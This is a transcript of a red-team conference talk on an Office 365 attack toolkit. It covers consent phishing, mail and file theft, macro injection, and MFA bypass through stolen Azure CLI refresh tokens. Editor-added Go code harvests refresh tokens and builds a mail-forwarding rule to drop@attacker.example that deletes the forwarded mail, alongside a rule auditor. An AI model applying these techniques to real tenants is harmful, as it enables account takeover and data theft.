
Okay, so hi everyone, thank you for coming to my talk. This is "Introducing the Office 365 Attack Toolkit", so let's continue.

Who am I? My name is Rio Sherri. I work as a senior security consultant at MDSec, where I'm responsible for performing red team operations, pentest services and other interesting offensive security stuff. I'm also interested in low-level research like Windows internals, playing with reverse engineering and also with exploitation. In my free time, and in company time as well, I develop offensive security tools, and you can find more about the tools and research on our blog or follow me on Twitter.

So, what is this talk about? During our red team operations we frequently come into contact with organizations using Office 365, and usually when we did operations you had to develop tools all the time, because the tools that were publicly available were somehow limited. That's why we decided to create a new tool, the Office 365 Attack Toolkit, that we can use during operations without the hassle of going to modify and develop new tools. So in this talk I will explain all the features this tool has and how it can assist you if you are performing a phishing simulation or red team exercise. I'll also revisit authentication token phishing, what it is and how it works, and then we'll take a look at the Microsoft Graph API and how we can use it
for our purpose, and as a bonus I will talk about something interesting I found in the Azure CLI.

So what is Office 365? As probably many of you know, Office 365 is the line of subscription services offered by Microsoft. Essentially it allows companies to run the Office suite as a cloud-based software service, and it allows you to run that without the headache of managing hundreds of different Office versions across your entire environment. It's also safer than the average company deployment; that's because it's always up to date, obviously, but also some of the features that are usually exploitable on workstations and laptops are not available, like for example macros. And even if you have a zero-day for Word, if they are using Office 365 on the web the document is not actually parsed in the user's Word application but on the web, so it won't affect it. There are some ways to get around that and trick the user into opening the document on their local computer, which I will talk about later on. So that's all about Office 365; if you want to read more you can just go on Google and find as much information as you want.

The other part of this talk is the Microsoft Graph API. So essentially the Microsoft Graph API is a developer API platform which allows developers to integrate their applications with the Office 365 products, for example to integrate with OneDrive, SharePoint, you name it. So this is built on top of Office 365, but it's not actually limited to Office 365. For example, if you are a company and you want to create a bot that sends and receives emails, you can easily do that, because the Graph API allows you to interact with Outlook, to access user emails, to send emails as a user, and many other features. Also, let's say you want to make an anti-virus for your cloud environment, for example for the files that are on OneDrive or SharePoint; you can easily do that, you can just call the Graph API and access the files that are there like a proper file system. So as you can see from the two examples I gave, and there are many, many more features, but only from these two examples you can see that this API is really, really powerful, and when something is really powerful it also leaves room for abuse. So that's what the tool does. But to call the Microsoft Graph API we first need to have an authentication token, an access token. So basically the access token is the token that is provided to you by the Microsoft identity platform, and it has the permissions that the user granted you. I will tell you later on about how that works and what permissions the user gives you, but first I want to revisit the
authentication token phishing. So what is authentication token phishing? Authentication token phishing is not your traditional phishing where the user enters his credentials on a website and then you steal them and then you can use them to perform operations. In this case the credentials are entered on the legitimate Microsoft website, so while users are trained, sorry to say, are trained to not enter their credentials on a malicious website, this gets around it, because they are literally entering them on the legitimate Microsoft website. This is really useful as well because recently we have seen a rise in multi-factor authentication, and if the user is using multi-factor authentication, let's say you use something like Evilginx to retrieve the username, password and token, you're really time-limited on what you can do, so you need to log in immediately, otherwise the token will not be valid anymore. This gets around it, because when the user grants you the permissions to perform actions on their behalf, you don't have to use any MFA token because you're literally just performing actions. So this in itself is not something new; the first publicly documented attack was by APT28 in the famous DNC hack, when they abused Google OAuth to actually compromise, I don't remember the name of the politician, but to compromise his emails, and then leaked them to, sorry,
yes, leaked them on the Internet, on WikiLeaks.

So now we have a good understanding of all the, let's say, methodologies this tool uses. So what is the Office 365 Attack Toolkit? The Office 365 Attack Toolkit is a tool developed in Golang which allows operators to perform authentication token phishing, and then after getting a valid access token it will start to call the Microsoft Graph API and use the permissions that the user granted to perform actions on their behalf. So there are currently some supported features: the extraction of emails matching specific keywords, the creation of malicious Outlook rules, the extraction of files from OneDrive/SharePoint, and macro injection on Word documents. So I will talk in a bit more detail about how we can use these features to actually be useful when you are performing a phishing assessment or something similar.

The first feature is the extraction of emails using predefined keywords from Outlook. So, as you may know, people usually store a lot of confidential information in email, including usernames and passwords, confidential user data like attachments, and we have even seen cases of spreadsheets containing passwords in their email. So what you can do is define specific keywords that this tool will search the user's mailbox for, and for every mail that matches a specific keyword it will download and save it, and then you can later on investigate all the emails and see all the contents.

Another interesting one is the extraction of files using predefined keywords from OneDrive/SharePoint. This works the same way, you just define keywords, but in comparison with the download of emails this actually downloads the files. So for example if the user has uploaded an SQL file with all the customer credentials, you can specify the SQL keyword and then it will download all the SQL files, or if the user has a password spreadsheet on his OneDrive or a KeePass password database, you can do that, you just
specify the keyword, and when the user grants you permission the tool will search all the files that the user has, download those that match the keywords, and then the attacker, or us in this case, can just use that information to further compromise the environment.

The other one, and this is quite interesting, is the creation of malicious Outlook rules. As you may know, Outlook has a rule engine which allows you to perform actions when specific events happen, and this is really useful for us as attackers as well, because we can come up with really good, creative ideas. So for example you can create a rule on Outlook that will forward all the emails containing sensitive information to an attacker-controlled email address. For example, if you create a new rule and say "if it has an attachment and it has keywords like top secret or confidential or passwords", then when the email comes in, from whoever, it will send that email to the attacker-controlled email address. So even if you have lost access, the rules will probably still be there, because no one looks at the rules, and then you get the data. So even if you literally don't have access anymore, you still keep receiving confidential data about the client.

The other one is the forwarding of password reset emails. Let's say the user is using a third-party system and they signed up with their work email address. What we can do is create a rule that says "if there are any password reset emails", let's just say if it contains the words "password" and "reset", then forward all these emails to an attacker-controlled email address. In this case you just go to the third-party service, issue a password reset, the email with the password reset information will be sent to the user, but then also, because the rule is there, it will parse this email and also send it to the attacker, and in this case you can literally get access to a third-party service without even having access to the user's email anymore. I didn't know this feature, but apparently Outlook also allows you to create rules based on outgoing emails, so in this case you can create an email rule that will prevent the user from reporting that something suspicious is going on, for example if he emails the security team. So yeah, this is about Outlook rule creation.

Let's go to the Word document macro injection. This is actually my favorite feature of this tool, as it allows you to inject a macro into the user's Word documents that are stored on OneDrive. So if this feature is enabled, what
it will do is retrieve the 15 last accessed documents of the victim, inject the macro that you previously defined in a configuration file, and then upload them to OneDrive, replacing the original file. So you may ask, okay, you define the macro, but you previously said that macros do not work on Office 365, which is true, and then we come back to the interesting part. So apparently Office 365 does not support Word 2003 documents. So what you can do is, if you change the extension of the file from .docx to .doc, then obviously Office 365 will not parse it and will tell the user that you need to download and open it locally, which is really useful. And since the document in itself is the original, and this is literally something that the user thinks is private, it is way more trusted than something that comes from the Internet, and the chances of the user actually enabling content and executing the macro are really high. So yeah, that's all about the toolkit's features.

I will also talk a lot about how to deploy it properly, but first we need to understand the components this tool is made from. So there are three main components. The first one is the phishing endpoint, which serves the phishing page to the user. The other one is the back-end service, which is responsible for performing all the attacks, so it retrieves the access token and then does all the defined attacks, like the extraction of emails, extraction of files and injection of macros into documents. And then we have the management interface, which is pretty clear by the name as well, which is used to inspect the extracted information that you got from the user.

But how would the proper architecture look? So this is the suggested deployment, and as you can see there's the attacking infrastructure, which is constructed from two servers: the first one is an HTTP-based redirector, which forwards all the traffic to our external server, which is the
phishing endpoint. Then the host running the toolkit, the back-end service, will call the Microsoft Graph API and perform all the attacks, and then we as the attacker can use the management interface to inspect all the data. I will get back to why we need to use such an isolated architecture later on, but first let's see how we can deploy it.

So there are three main components in the configuration file: the server, keywords and the backdoor. The server component contains five options: the host, which is the IP address of the external listener or the phishing endpoint; the external port, the port where the phishing endpoint will listen; then we have certificate and key, which are the public certificate and private key if you want to use HTTPS for your phishing endpoint; and then we also have the internal port, which is the management interface. As you can see there is no host for the internal management interface; this is because it only listens on localhost. Then we get to keywords. We have two options here, and they're quite similar but they do different things. In this case I defined five keywords that I want to extract from Outlook emails, which are "password", "VPN", "creds", "credentials", and then from OneDrive we do the same: we extract the password files, or the files containing the word "password", the files containing "config" or "XML" or "database", which are usually the files that have confidential information. And then the third option is the backdoor; we can enable or disable this, and the macro is the file path of the macro document you want to inject. It should be mentioned that the backdooring functionality only works on Linux, oh sorry, on Windows, as essentially how this injection works is it uses the Word COM object to open the file and then inject the macro.

So yeah, now that we have a proper configuration, we need to create an app, because to call any Microsoft
Graph API resource you have to have an app registered in Azure. You can easily do that: you just go to Azure Active Directory, App registrations, register an application, and you can define the name that you want. In this case I just called it "cool app", but you can change the name to whatever matches your pretext when you're doing the phishing. Also just keep in mind to select "accounts in any organizational directory", because if you don't select this one you can only attack, or let's say phish, users that are in the same organizational directory, which is not really useful, but in some cases this is okay. So you created the application, you get the application ID and then you change it in static/index.html, and then you add the redirect URL with your phishing endpoint. Basically the redirect URL is used by Microsoft when they send the access token, so this is your phishing endpoint, and it has to be correct because otherwise it won't work. Also, because the current implementation is just a single-page JavaScript web app, you need to enable implicit grant, because otherwise it won't work again. So yeah, by default the phishing endpoint is not pretty and not useful, and I'm really bad at designing, but I also left it like that on purpose, because I don't want to provide people with a full template
which they can just straight away use to phish other people. But it's fairly easy to modify, as the HTML file is hosted at static/index.html, so you can just change the static/index.html file to whatever the pretext is, and then you're good to go.

So now you configured the tool, you changed your phishing HTML file, you created all the Outlook rules that you want, and then you're ready to go, right? Well, as you may know, with any tool that you run on your system, be it a defensive tool or an offensive security tool, there's always a place for other people to attack, there's always an increase in attack surface. So in this case I wanted to talk about some of the attack surface, which is not, let's say, really dangerous, but at some point it may be if you don't do things properly. The macro injection functionality is kind of dangerous in this case if you don't do it properly, obviously, because the way it works is it downloads the user's files and then stores them on your attacker machine and then uses this Word COM object to actually open the Word document and inject the macro. So in this case, if you're running an old version of Windows and you're running the tool on your main box, then things can go really wrong, because if the file that you downloaded, that matches that specific keyword and has been used by the user, actually contains a macro or some exploit code that targets the version of Windows or Office that you're running on your box, then things may go wrong. So it's always important, and that's why I suggest that architecture, to have proper isolation between the hosts and to also use an updated Office, because even as attackers we need to use updated software, otherwise we will get popped. Then the extraction of keyword-matched files may also bring danger. This is not really dangerous, but we have seen cases where just by a file being present on the file system it can trigger some exploit. We saw that with Stuxnet, which was an LNK flaw that gave you command execution, and then we also saw the same recently with Linux, where there was a KDE command injection bug. So yeah, you need to be made aware of all the dangers that this may pose. As I said, I'm saying this from a perspective where an attacker is trying to attack the attacker; I mean, it probably won't happen in your lifetime, but it's good to know. Also, as I mentioned, as is also suggested on the defensive side of security, we also need to properly isolate, configure and manage the infrastructure securely.

So yeah, that's all about the Office 365 Attack Toolkit. I still have not finished, I'm going to do a quick demo. Okay, so I'm pretty sure it's not really visible, is it? Yeah it is, okay. So as you can see we have a Windows VM which is running the toolkit. You can see that it says "loaded macro successfully", because I defined one locally just to demonstrate the feature, and then we have the internal server and the external server both running on localhost; this is just for demonstration purposes. So yeah, this is our user that is going to be phished. He has two documents, the business partnership document and the password
document, which is kind of funny, because sometimes it is, it's both Word documents and Excel spreadsheets with passwords. So just keep in mind the extension is actually .docx, because it will change later on. Then we have an email which supposedly contains some credentials; this is also just to demonstrate. And then, as we can see, there are no inbox rules on this user. So this is the best-looking phishing endpoint, I'm pretty sure everyone will agree, right? So when the user clicks sign-in, actually a Microsoft page pops up, not the Microsoft sign-in page but a Microsoft page, and it says to you that this application is trying to request permissions, and my application's name in this case is "Cecily G tank", which is nothing, but you can change that to match whatever pretext you are using to do the phishing. And as you can see, they are pretty clear about what the app will access: it says it will read your contacts, read your email, read all OneNote notebooks, read all your files and everything, but the user will still click accept, because that's the blue button and it looks cool to click it. So after the user clicks accept, at this moment we get the access token, and then the back-end service is actually performing all the attacks in the back end.

So this is the management interface; we'll get back to it again, but let's see if our attack worked. We can see there were previously no rules defined, and then refreshing the page we can see that the rule is there, like the example that I previously defined, that will send all the password reset emails to the attacker. Also, as you can see, the document the user had has just been changed, and also the file extension has been renamed from .docx to .doc, so when he tries to open it he cannot edit it, and when he downloads it to his box and opens it, it's literally the same document that the user had, so he gets "enable editing" because Protected View is enabled, and when he clicks "enable content" then our malicious macro gets executed; in this case it's just a message box, but it can be whatever you want. Then we can go to the management interface, we can click on emails and see all the emails that have been extracted from this user. You can see the body preview of all the emails, but you can also see the entire email by clicking "view email". Also you can view and download the files that have been extracted from this user; in this case only one file matched the rule, the password.docx, but as I mentioned this is just for demonstration purposes, in
real life way more files would match. So that's the demo for the Office 365 Attack Toolkit; let's get back to the presentation.

So why is the Azure CLI in this talk? For those who don't know, Azure CLI is a command-line tool which allows you to manage Azure resources and to actually automate the creation of Azure resources, and it's really easy to learn and quite powerful. So I was playing around with it and then I figured something strange was happening. Before using the tool you have to use the command "az login", which will open a Microsoft Azure sign-in page, and you enter the credentials and then it will just work magically. I got back to using the tool after one month, and then it worked, it didn't ask me to log in, and I was like okay, there's something weird going on. So I just set it up again and looked at the entire workflow of this tool. Essentially it was starting a local web server and then sending the access token to the local web server, the access and refresh tokens, and then it was storing that access and refresh token on the file system in clear text. I was like, that's not really good. There was a file named accessTokens.json which contained the refresh token and the access token. So, let's begin with the access token: the access token is actually the token that you use to access the Graph API or other APIs on Microsoft, but the thing is that this token by itself is not really useful if you manage to get access to it, as its lifetime is, I think, one hour, so not really useful. But then we have the refresh token, whose lifetime is, I think, one year or something like that, and this token can be used to get new access tokens. So if you have the refresh token you can just retrieve your access token and call the Graph or any API that you want. This is really useful because, as I mentioned earlier, a lot of users and admins are using 2FA or MFA, but the problem is that when you grant access to an application, the application doesn't have to use MFA anymore; it can just go and call the API it wants. So I did a tool for this, it's called the Azure CLI extractor; I still haven't published it, but I will publish it later on on my GitHub. Basically what this tool does is extract the access token and the refresh token, and then it can create a new global administrator on Azure or Office 365. And because this tool is mostly used by, let's say, system admins and IT people generally, they have more privileges in Azure and Office 365. So yeah, we can use that even
if they have MFA, we can use that to get around it and compromise their cloud environment. I also have a demo for this one, which is way easier to explain rather than just talking randomly. So let's suppose we managed to gain access to some user's machine and we got his username and password, right? So cool, now we just completed our objective: we go to sign-in, we enter the password, I try to sign in, and then, not so fast, this administrator has 2FA enabled, so we either have to compromise his phone or find another way around it. If I want to spend millions on compromising phones, well, we're not Saudi Arabia. Fortunately for us, this user has the Azure CLI toolkit installed, so what we can do is use the Azure CLI extractor and call the user command. Then we can define the options, like the display name, which is "demo user", the user name, which in this case is "compromised", and then we also have to define the user principal name, which is, let's say, not exactly the email address, and in this case is "compromised" at the demo tenant's onmicrosoft.com domain, and then we need to specify the password, which you also need to have match the password policy for Office 365. And as we can see, the tool did its job: it has created a new user and then added that user to the Global Administrator role. So we didn't manage to get access using the demo account, but then we just use the newly created account to log in. We enter the email address, then we enter the password that we created, which is "secured password 123" (I changed it, so don't try to log in), and then we can see we managed to gain access to the portal, and as you can see we also have administrative permissions. It's a bit confusing here because that is the name I was using in the demo, and then we log into the Office 365 administrator portal with high privileges, bypassing 2FA completely. So that's all about the Azure CLI.
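The following Go code is an added example by the editor; it is not part of the talk and not code from the MDSec toolkit or from the speaker's Azure CLI extractor. It ties together the two token paths the talk has covered: the access token that the implicit grant (response_type=token) delivers in the URL fragment of the phishing endpoint's redirect URL, which is why the app registration needs implicit grant enabled and an exact redirect URL, and the access/refresh token pairs the Azure CLI kept in accessTokens.json. The code parses the redirect fragment, reads the token's claims without verifying the signature (we hold the token; we only want to know whose it is, which API it is for and when it expires), picks out the Azure CLI entries whose access token is already dead but whose refresh token is still present, and builds the refresh_token grant body that turns such a refresh token into a fresh access token with no MFA prompt. The sample JWT and the accessTokens.json content are constructed; the field names in that file (expiresOn, resource, refreshToken, _clientId) and the client ID, tenant and address values are assumptions, not details from the talk.

```go
package main

import (
	"encoding/base64"
	"encoding/json"
	"fmt"
	"net/url"
	"strings"
	"time"
)

// ParseImplicitGrantFragment reads the parameters Azure AD appends after '#' when the implicit grant
// redirects the victim back to the registered redirect URL (access_token, token_type, expires_in, scope,
// state). Fragments never reach the server, so the phishing page's JavaScript has to do this step.
func ParseImplicitGrantFragment(redirectedTo string) (url.Values, error) {
	u, err := url.Parse(redirectedTo)
	if err != nil {
		return nil, err
	}
	vals, err := url.ParseQuery(u.Fragment)
	if err != nil {
		return nil, err
	}
	if vals.Get("access_token") == "" { // consent refused or misconfigured app: Azure AD sends error=...
		return nil, fmt.Errorf("no access_token in fragment (error=%q)", vals.Get("error"))
	}
	return vals, nil
}

// Claims are the standard Azure AD access-token claims read here.
type Claims struct {
	UPN string `json:"upn"`
	Aud string `json:"aud"`
	Exp int64  `json:"exp"`
}

// DecodeJWTClaims reads a compact JWT's payload WITHOUT verifying its signature: we hold the token and
// only want to know whose it is, which API it is for and when it expires.
func DecodeJWTClaims(token string) (Claims, error) {
	var c Claims
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return c, fmt.Errorf("not a compact JWT")
	}
	payload, err := base64.RawURLEncoding.DecodeString(parts[1])
	if err != nil {
		return c, err
	}
	return c, json.Unmarshal(payload, &c)
}

// SampleToken builds an unsigned JWT so the example runs offline (constructed data, not a real token).
func SampleToken(upn, aud string, exp int64) string {
	enc := func(v interface{}) string { b, _ := json.Marshal(v); return base64.RawURLEncoding.EncodeToString(b) }
	return enc(map[string]string{"alg": "none", "typ": "JWT"}) + "." + enc(Claims{UPN: upn, Aud: aud, Exp: exp}) + ".sig"
}

// AzCLIToken mirrors one entry of the Azure CLI's accessTokens.json. Field names are assumed from the file
// format of the time; the talk only says the file holds access and refresh tokens in clear text.
type AzCLIToken struct {
	ExpiresOn    string `json:"expiresOn"`
	Resource     string `json:"resource"`
	RefreshToken string `json:"refreshToken"`
	ClientID     string `json:"_clientId"`
}

// SampleAccessTokensJSON is a constructed two-entry file: the first access token is still valid, the second expired.
const SampleAccessTokensJSON = `[
 {"expiresOn":"2019-09-01 04:00:00.000000","resource":"https://management.core.windows.net/","accessToken":"not-a-real-jwt",
  "refreshToken":"constructed-refresh-mgmt","userId":"admin@contoso.example","_clientId":"cli-client-id-assumed"},
 {"expiresOn":"2019-08-31 23:00:00.000000","resource":"https://graph.windows.net/","accessToken":"not-a-real-jwt",
  "refreshToken":"constructed-refresh-graph","userId":"admin@contoso.example","_clientId":"cli-client-id-assumed"}]`

// UsableRefreshTokens returns entries whose access token has expired at `now` but which still carry a refresh
// token: the dead access token is worthless, the long-lived refresh token is the prize.
func UsableRefreshTokens(data []byte, now time.Time) ([]AzCLIToken, error) {
	var entries []AzCLIToken
	if err := json.Unmarshal(data, &entries); err != nil {
		return nil, err
	}
	var out []AzCLIToken
	for _, e := range entries {
		exp, err := time.Parse("2006-01-02 15:04:05", e.ExpiresOn) // Go accepts the trailing fractional seconds
		if err != nil || e.RefreshToken == "" || exp.After(now) {
			continue
		}
		out = append(out, e)
	}
	return out, nil
}

// RefreshGrantForm is the body of POST {authority}/oauth2/token that trades the refresh token for a new access
// token for `resource`. MFA was satisfied once at `az login`; this grant never prompts again.
func RefreshGrantForm(t AzCLIToken, resource string) string {
	v := url.Values{}
	v.Set("grant_type", "refresh_token")
	v.Set("client_id", t.ClientID)
	v.Set("refresh_token", t.RefreshToken)
	v.Set("resource", resource)
	return v.Encode()
}

func main() {
	tok := SampleToken("victim@contoso.example", "https://graph.microsoft.com", 1700000000)
	vals, _ := ParseImplicitGrantFragment("https://phish.example/#access_token=" + tok + "&token_type=Bearer&expires_in=3599")
	c, _ := DecodeJWTClaims(vals.Get("access_token"))
	fmt.Printf("phished token for %s (aud %s) expires %s\n", c.UPN, c.Aud, time.Unix(c.Exp, 0).UTC())
	usable, _ := UsableRefreshTokens([]byte(SampleAccessTokensJSON), time.Date(2019, 9, 1, 0, 0, 0, 0, time.UTC))
	for _, e := range usable {
		fmt.Printf("%s: refresh token still usable, grant body: %s\n", e.Resource, RefreshGrantForm(e, "https://graph.microsoft.com/"))
	}
}
```

The aud claim tells you which API a phished access token is good for; a Graph-audience token is useless against Azure Resource Manager. That is one more reason the refresh token is the interesting artefact: the refresh_token grant can request an access token for a different resource than the one the expired access token was issued for.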
So everyone is saying, okay, this is quite cool, but I work on the defensive side, and if people start using this to phish my users, what can I do? So there is actually a lot of stuff that you can do, and I think Microsoft has one of the best sets of tools to use to prevent all sorts of attacks. The first one is you need to restrict users from registering applications. Basically, by default any user in your Azure Active Directory environment can register an application. This is really useful if you're an attacker, because if you manage to compromise a user then you can register your application, and the application will be from the same organizational directory and it's like trusted, so when you send a phish to the user, the user will see that okay, this is an application from our company, so it should be legit, and they are more susceptible to phishing attacks. If you stop users from registering apps, and only allow administrators or developers to do so, you will prevent this kind of attack. Also, if you don't use any third-party apps, you can disable them entirely, which is what most people do, hopefully. And then if you see that an application is compromising one of your users, you can revoke the permissions that this application has and also notify the user. And if you're doing incident response for this kind of compromise, there is a feature called OAuth auditing on Microsoft, which essentially provides you comprehensive monitoring of all the activities performed by an application, which is quite useful, and I think every system that uses this kind of architecture should have it. Also on the Cloud App Security portal you can define alerts, so for example if an application gets permission to a user mailbox to read all the emails, that's not really how it should work, so you get an alert and check whether that application is legitimate or not. Also you can search for risky apps using the same portal; there are a lot of queries, but in this case it's searching whether any app has requested these permissions from the user, which are read/write access to user email and full access to the mailboxes and other stuff that is not normally used by a legitimate application but is used a lot by attackers.

So I was quite surprised when I saw on a news portal that apparently Facebook is improving and they are now notifying users whenever a third-party application actually logs in, let's say accesses resources using the permissions they were granted previously, which I think is quite cool and is the way to go, and I think Microsoft should also implement this, because currently, as far as I'm aware, the tools are only targeted at admins. So let's say if you want to investigate what happened, you cannot see when the application got access to a specific resource or what happened; only the administrator can see it. So I think Microsoft should also implement this: whenever a third-party application accesses a resource they should notify the user. It doesn't have to be an email, but you can notify the user that look, this application just accessed this resource, and then the user will be more aware of what application is going on in the back. So that's about mitigations. I also want to talk about some
references. So there is a lot of cool stuff going around from Chromium on the defensive security side, and if you're not following him, you probably are, but if you're not you should follow him; he's putting out some really amazing research not only for Azure and Office 365 but Active Directory as well. Then there is another tool called PwnAuth from FireEye (Doug Bienstock), which has a similar approach but it's more targeted at proof of concept rather than fully weaponized. I also wanted to mention massive scale dot com, which is quite useful and explains all this Microsoft stuff really well. And as always, the site that I spend most of my life on is docs.microsoft.com, which contains all the information about the Graph API and any kind of Microsoft product. Yeah, I think I'm quite ahead of time, which is cool, so we have a lot of time for questions. Anyone have any questions? Yep.

[Question inaudible]

No, so actually the way, the thing, also the case was, when you're already in an environment, let's say you're trying to compromise some administrators, and in this case you're already in the environment, you managed to get access to that file, let's say by either finding a backup or a network share where someone shared their home folder, which is usually the case. So there are a lot of ways you can get to the environment; MFA is really helpful and it's a real headache, but then there is a lot of stuff that you can use to actually get around it.

[Question inaudible]

Yes, yes. Also, if you have some specific... I cannot recall correctly how to do it, but I'm pretty sure there is a way to only allow specific applications to access the user's resources. You can even specify the application permissions, so for example if you want an app to only access the user information, even if that application goes rogue and says "okay, I'm going to steal all the user emails", they can't, because you previously defined that this application should only have access to this resource.
[Question inaudible]

Yes, yes, you can. So basically this tool is more aimed at users, but if you phish an administrator then you can do a lot more damaging stuff. But in most cases it's not really useful to phish administrators, because they are more trained in how these systems work, but there have been a lot of cases where that happens. Anyone else?

[Question inaudible]

Okay, well, so I haven't looked at a write-up on that until now. Yeah, I haven't looked at it, I haven't thought about it; maybe, I think the Microsoft pages, they literally have so much documentation and explain things in much detail, so I think the best place is Microsoft itself. No one else? No curiosity anymore? Okay, then thank you very much.
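Added example by the editor, not from the talk and not the toolkit's own code: the Outlook rule abuse described in the talk, expressed as the Microsoft Graph messageRule resource, together with the defensive check the mitigations part of the talk asks for. NewForwardRule builds the rule (keywords such as "password" and "reset" in body or subject, forward to an attacker address, delete the original so the owner never sees it); the back end would POST its JSON to RulesEndpoint with the phished token as bearer authorization. AuditRules is the defender's side: it walks the listing that GET /users/{id}/mailFolders/inbox/messageRules returns for a mailbox and flags rules that forward outside the organisation's domain, trigger on credential-related words, or delete the forwarded mail. The rule listing is constructed sample data, and the organisation domain contoso.example and the attacker address are placeholders.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Recipient and MessageRule mirror the subset of the Graph messageRule resource used here.
type Recipient struct {
	EmailAddress struct {
		Address string `json:"address"`
	} `json:"emailAddress"`
}
type MessageRule struct {
	DisplayName string `json:"displayName"`
	Sequence    int    `json:"sequence"`
	IsEnabled   bool   `json:"isEnabled"`
	Conditions  struct {
		SubjectContains       []string `json:"subjectContains,omitempty"`
		BodyOrSubjectContains []string `json:"bodyOrSubjectContains,omitempty"`
	} `json:"conditions"`
	Actions struct {
		ForwardTo []Recipient `json:"forwardTo,omitempty"`
		Delete    bool        `json:"delete,omitempty"`
	} `json:"actions"`
}

// RulesEndpoint is where the back end POSTs the JSON of NewForwardRule with "Authorization: Bearer <phished token>".
const RulesEndpoint = "https://graph.microsoft.com/v1.0/me/mailFolders/inbox/messageRules"

// NewForwardRule is the rule from the talk: mail whose body or subject mentions a keyword is forwarded to the
// attacker and then deleted from the victim's inbox so that nothing looks out of place.
func NewForwardRule(name string, keywords []string, forwardTo string) MessageRule {
	r := MessageRule{DisplayName: name, Sequence: 1, IsEnabled: true}
	r.Conditions.BodyOrSubjectContains = keywords
	var to Recipient
	to.EmailAddress.Address = forwardTo
	r.Actions.ForwardTo, r.Actions.Delete = []Recipient{to}, true
	return r
}

// Finding is one suspicious rule and the reasons it was flagged.
type Finding struct {
	Rule    string
	Reasons []string
}

var credentialWords = []string{"password", "passwd", "reset", "credential", "confidential", "secret", "vpn", "mfa"}

// AuditRules is the defender's side. Over the {"value":[...]} envelope that GET /users/{id}/mailFolders/inbox/messageRules
// returns, it flags rules that forward outside orgDomain, trigger on credential-related words, or delete the forwarded mail.
func AuditRules(listJSON []byte, orgDomain string) ([]Finding, error) {
	var list struct {
		Value []MessageRule `json:"value"`
	}
	if err := json.Unmarshal(listJSON, &list); err != nil {
		return nil, err
	}
	var findings []Finding
	for _, r := range list.Value {
		var reasons, ext, hits []string
		for _, to := range r.Actions.ForwardTo {
			if !strings.HasSuffix(strings.ToLower(to.EmailAddress.Address), "@"+strings.ToLower(orgDomain)) {
				ext = append(ext, to.EmailAddress.Address)
			}
		}
		conds := strings.ToLower(strings.Join(append(r.Conditions.SubjectContains, r.Conditions.BodyOrSubjectContains...), " "))
		for _, w := range credentialWords {
			if strings.Contains(conds, w) {
				hits = append(hits, w)
			}
		}
		if len(ext) > 0 {
			reasons = append(reasons, "forwards mail outside the organisation to "+strings.Join(ext, ", "))
		}
		if len(hits) > 0 {
			reasons = append(reasons, "triggers on credential-related words: "+strings.Join(hits, ", "))
		}
		if len(reasons) > 0 && r.Actions.Delete {
			reasons = append(reasons, "deletes the matched mail so the mailbox owner never sees it")
		}
		if len(reasons) > 0 {
			findings = append(findings, Finding{Rule: r.DisplayName, Reasons: reasons})
		}
	}
	return findings, nil
}

// SampleRuleListJSON is a constructed listing: one ordinary internal forward and the rule from the talk.
const SampleRuleListJSON = `{"value":[
 {"displayName":"Team mail","sequence":1,"isEnabled":true,"conditions":{"subjectContains":["[team]"]},
  "actions":{"forwardTo":[{"emailAddress":{"address":"alice@contoso.example"}}]}},
 {"displayName":"Sync","sequence":2,"isEnabled":true,"conditions":{"bodyOrSubjectContains":["password","reset"]},
  "actions":{"forwardTo":[{"emailAddress":{"address":"drop@attacker.example"}}],"delete":true}}]}`

func main() {
	body, _ := json.Marshal(NewForwardRule("Sync", []string{"password", "reset"}, "drop@attacker.example"))
	findings, _ := AuditRules([]byte(SampleRuleListJSON), "contoso.example")
	fmt.Printf("POST %s\n%s\n\n%d suspicious rule(s): %+v\n", RulesEndpoint, body, len(findings), findings)
}
```

Running this check over every mailbox is also the clean-up step the talk implies: because the rule keeps forwarding after the token is gone, revoking the application's consent alone does not stop the leak; the rule itself has to be found and deleted.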